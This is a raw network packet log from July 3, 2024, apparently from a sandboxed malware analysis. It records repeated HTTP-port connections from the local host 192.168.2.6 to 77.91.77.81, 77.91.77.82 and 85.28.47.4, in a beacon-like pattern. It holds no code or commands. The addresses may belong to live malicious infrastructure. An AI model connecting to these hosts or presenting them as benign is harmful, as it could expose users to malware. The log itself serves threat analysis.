                                                                Jul 3, 2024 08:38:37.243010998 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243029118 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243030071 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.243030071 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.243041039 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243052006 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.243055105 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243067026 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243069887 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.243069887 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.243077993 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243091106 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243103027 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243103981 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.243113995 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243125916 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243135929 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243146896 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243165970 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.243165970 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.243165970 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.243216991 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.243931055 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243942976 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243958950 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243969917 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243979931 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243989944 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.243993998 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.244002104 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244014978 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244021893 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.244024038 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244021893 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.244035959 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244045973 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.244048119 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244059086 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.244060993 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244072914 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244082928 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244086027 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.244093895 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244106054 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.244106054 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244117022 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244128942 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244138956 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.244138956 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.244139910 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244153023 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244194031 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.244194031 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.244501114 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.244822025 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244833946 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244843960 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244853973 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244863033 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244874001 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244883060 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244894028 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244903088 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244910955 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.244910955 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.244913101 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.244930983 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.245198011 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.245336056 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245347023 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245357037 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245373011 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245382071 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245393038 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245403051 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245412111 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.245414972 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245424986 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.245429039 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245440006 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245446920 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.245446920 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.245450974 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245464087 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245475054 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245491028 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245501041 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245511055 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245517015 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.245517015 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.245517015 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.245522976 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245536089 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245549917 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245549917 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.245560884 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.245582104 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.245604038 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.245604038 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.246275902 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246287107 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246296883 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246313095 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246323109 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246332884 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246341944 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246342897 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.246352911 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246361971 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.246361971 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.246364117 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246376038 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246386051 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246391058 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.246396065 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246407986 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246412039 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.246419907 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246428967 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.246429920 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246442080 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246452093 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246463060 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246470928 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.246470928 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.246473074 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246485949 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.246489048 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.246510983 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.246639013 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.247195005 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.247205973 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.247215986 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.247226000 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.247236013 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.247246981 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.247256994 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.247267962 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.247277975 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.247287989 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.247288942 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.247288942 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.247288942 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.247288942 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.247554064 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.247565985 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.247576952 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.247589111 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.247589111 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.247589111 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.247637987 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.247637987 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:38.171583891 CEST4972480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:38.171947002 CEST4972780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:38.176888943 CEST804972777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:38.176927090 CEST804972477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:38.176981926 CEST4972780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:38.177001953 CEST4972480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:38.177200079 CEST4972780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:38.182563066 CEST804972777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:38.300386906 CEST4972880192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:38.305699110 CEST804972885.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:38.305774927 CEST4972880192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:38.306242943 CEST4972880192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:38.311312914 CEST804972885.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:38.869559050 CEST804972777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:38.869627953 CEST4972780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:38.914588928 CEST804972885.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:38.914691925 CEST4972880192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:38.984421968 CEST4972780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:38.984817982 CEST4972980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:38.989649057 CEST804972777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:38.989686966 CEST804972977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:38.989737988 CEST4972780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:38.989823103 CEST4972980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:38.989955902 CEST4972980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:38.994771004 CEST804972977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:39.682209969 CEST804972977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:39.682969093 CEST4972980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:39.683696985 CEST4972980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:39.688744068 CEST804972977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:39.905415058 CEST804972977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:39.905678988 CEST4972980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:40.017682076 CEST4972980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:40.018054008 CEST4973080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:40.027977943 CEST804973077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:40.028076887 CEST4973080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:40.028215885 CEST4973080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:40.028460026 CEST804972977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:40.028559923 CEST4972980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:40.033020973 CEST804973077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:40.589694023 CEST4972880192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:40.714829922 CEST804973077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:40.714934111 CEST4973080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:40.715784073 CEST4973080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:40.720700026 CEST804973077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:40.931395054 CEST804973077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:40.931545973 CEST4973080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:41.046814919 CEST4973080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:41.047209978 CEST4973180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:41.051920891 CEST804973077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:41.052021980 CEST4973080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:41.052077055 CEST804973177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:41.052139997 CEST4973180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:41.052269936 CEST4973180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:41.057020903 CEST804973177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:41.744651079 CEST804973177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:41.744802952 CEST4973180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:41.745678902 CEST4973180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:41.750642061 CEST804973177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:41.967335939 CEST804973177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:41.967411041 CEST4973180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:42.079658031 CEST4973180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:42.080033064 CEST4973280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:42.084849119 CEST804973277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:42.084944963 CEST4973280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:42.084980011 CEST804973177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:42.085033894 CEST4973180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:42.085155964 CEST4973280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:42.089962006 CEST804973277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:42.771131039 CEST804973277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:42.771274090 CEST4973280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:42.772166967 CEST4973280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:42.777100086 CEST804973277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:42.991063118 CEST804973277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:42.991233110 CEST4973280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:43.094788074 CEST4973280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:43.095228910 CEST4973380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:43.100244999 CEST804973377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:43.100362062 CEST804973277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:43.100436926 CEST4973380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:43.100500107 CEST4973280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:43.100665092 CEST4973380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:43.105437994 CEST804973377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:43.773608923 CEST804973377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:43.773682117 CEST4973380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:43.776762009 CEST4973380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:43.781624079 CEST804973377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:43.989880085 CEST804973377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:43.990032911 CEST4973380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:44.093559980 CEST4973380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:44.093972921 CEST4973480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:44.099026918 CEST804973477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:44.099127054 CEST4973480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:44.099236012 CEST4973480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:44.100009918 CEST804973377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:44.100063086 CEST4973380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:44.105433941 CEST804973477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:44.791132927 CEST804973477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:44.791358948 CEST4973480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:44.791996956 CEST4973480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:44.796792030 CEST804973477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:45.006660938 CEST804973477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:45.006772041 CEST4973480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:45.109355927 CEST4973480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:45.109751940 CEST4973580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:45.114617109 CEST804973577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:45.114633083 CEST804973477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:45.114727974 CEST4973480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:45.114753008 CEST4973580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:45.114963055 CEST4973580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:45.119779110 CEST804973577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:45.821857929 CEST804973577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:45.821969986 CEST4973580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:45.822844028 CEST4973580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:45.827758074 CEST804973577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:46.055525064 CEST804973577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:46.055649996 CEST4973580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:46.171547890 CEST4973580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:46.171890974 CEST4973680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:46.177762985 CEST804973677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:46.177836895 CEST4973680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:46.177970886 CEST4973680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:46.178991079 CEST804973577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:46.179045916 CEST4973580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:46.182929039 CEST804973677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:46.855920076 CEST804973677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:46.856018066 CEST4973680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:46.856861115 CEST4973680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:46.861953020 CEST804973677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:47.070674896 CEST804973677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:47.070821047 CEST4973680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:47.187284946 CEST4973680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:47.187585115 CEST4973780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:47.192547083 CEST804973777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:47.192702055 CEST804973677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:47.192869902 CEST4973680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:47.192965984 CEST4973780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:47.192965984 CEST4973780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:47.197797060 CEST804973777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:47.897663116 CEST804973777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:47.897803068 CEST4973780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:47.898627043 CEST4973780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:47.903459072 CEST804973777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:48.119134903 CEST804973777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:48.119280100 CEST4973780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:48.234227896 CEST4973780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:48.234570980 CEST4973880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:48.421557903 CEST804973877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:48.421646118 CEST4973880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:48.421897888 CEST4973880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:48.422665119 CEST804973777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:48.422714949 CEST4973780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:48.426815987 CEST804973877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:49.116040945 CEST804973877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:49.119811058 CEST4973880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:49.120646954 CEST4973880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:49.125580072 CEST804973877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:49.336291075 CEST804973877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:49.336886883 CEST4973880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:49.454010963 CEST4973880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:49.454461098 CEST4973980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:49.459316015 CEST804973877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:49.459331036 CEST804973977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:49.459445000 CEST4973880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:49.459561110 CEST4973980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:49.459661007 CEST4973980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:49.464695930 CEST804973977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:50.165868998 CEST804973977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:50.165960073 CEST4973980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:50.166752100 CEST4973980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:50.171576023 CEST804973977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:50.388020992 CEST804973977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:50.388118982 CEST4973980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:50.500082016 CEST4973980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:50.500411987 CEST4974080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:50.505954981 CEST804974077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:50.506045103 CEST4974080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:50.506165028 CEST4974080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:50.506864071 CEST804973977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:50.506937981 CEST4973980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:50.511499882 CEST804974077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:51.192215919 CEST804974077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:51.192332029 CEST4974080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:51.193169117 CEST4974080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:51.197941065 CEST804974077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:51.410569906 CEST804974077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:38:51.410646915 CEST4974080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:51.515577078 CEST4974080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:38:51.515985966 CEST4974180192.168.2.677.91.77.82
